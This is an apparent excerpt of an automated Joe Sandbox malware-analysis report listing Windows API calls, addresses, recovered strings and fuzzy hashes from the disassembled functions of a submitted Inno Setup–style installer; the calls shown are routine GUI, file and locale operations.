                                                                                                      • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                      • String ID: Explorer
                                                                                                      • API String ID: 2594429197-512347832
                                                                                                      • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                      • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                                      • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                      • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                      • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8), ref: 004783CC
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                      • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                      • API String ID: 2704155762-2318956294
                                                                                                      • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                      • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                                      • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                      • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                      • LocalFree.KERNEL32(007CE478,00000000,00401B68), ref: 00401ACF
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,007CE478,00000000,00401B68), ref: 00401AEE
                                                                                                      • LocalFree.KERNEL32(007CF478,?,00000000,00008000,007CE478,00000000,00401B68), ref: 00401B2D
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                      • String ID: x|
                                                                                                      • API String ID: 3782394904-1195792818
                                                                                                      • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                      • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                      • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                      • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                                        • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                                      Strings
                                                                                                      • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                                      • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                                      • Deleting directory: %s, xrefs: 00459E5B
                                                                                                      • Stripped read-only attribute., xrefs: 00459E94
                                                                                                      • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                                      • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                                      • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorFindLast
                                                                                                      • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                      • API String ID: 754982922-1448842058
                                                                                                      • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                      • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                                      • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                      • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                                      APIs
                                                                                                      • GetCapture.USER32 ref: 00422EA4
                                                                                                      • GetCapture.USER32 ref: 00422EB3
                                                                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                                      • ReleaseCapture.USER32 ref: 00422EBE
                                                                                                      • GetActiveWindow.USER32 ref: 00422ECD
                                                                                                      • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                                      • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                                      • GetActiveWindow.USER32 ref: 00422FBF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 862346643-0
                                                                                                      • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                      • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                                      • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                      • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                                      • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                                      • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveLong$Message
                                                                                                      • String ID:
                                                                                                      • API String ID: 2785966331-0
                                                                                                      • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                      • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                                      • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                      • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0042948A
                                                                                                      • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                                        • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1583807278-0
                                                                                                      • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                      • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                                      • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                      • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0041DE27
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                                      • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                                      • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                                      • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                                      • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                                      • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 225703358-0
                                                                                                      • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                                      • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                                      • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                                      • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                                      APIs
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                                      • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$Load
                                                                                                      • String ID: $ $Internal error: Item already expanding
                                                                                                      • API String ID: 1675784387-1948079669
                                                                                                      • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                      • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                                      • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                      • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                                      APIs
                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                      • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                      • API String ID: 390214022-3304407042
                                                                                                      • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                      • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                                      • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                      • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                                      APIs
                                                                                                      • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                                      • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                                      • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassInfoLongMessageSendWindow
                                                                                                      • String ID: COMBOBOX$Inno Setup: Language
                                                                                                      • API String ID: 3391662889-4234151509
                                                                                                      • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                      • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                                      • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                      • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                                        • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                        • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                      • API String ID: 1044490935-665933166
                                                                                                      • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                      • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                                      • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                      • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                                      • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                                        • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                                      • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                                        • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                                      • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                      • String ID: ,$?
                                                                                                      • API String ID: 2359071979-2308483597
                                                                                                      • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                      • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                                      • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                      • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                                      APIs
                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                                      • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                                      • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                                      • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                      • String ID:
                                                                                                      • API String ID: 1030595962-0
                                                                                                      • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                      • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                                      • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                      • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                                      APIs
                                                                                                      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                                      • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                                      • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                                      • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                                      • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                                      • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
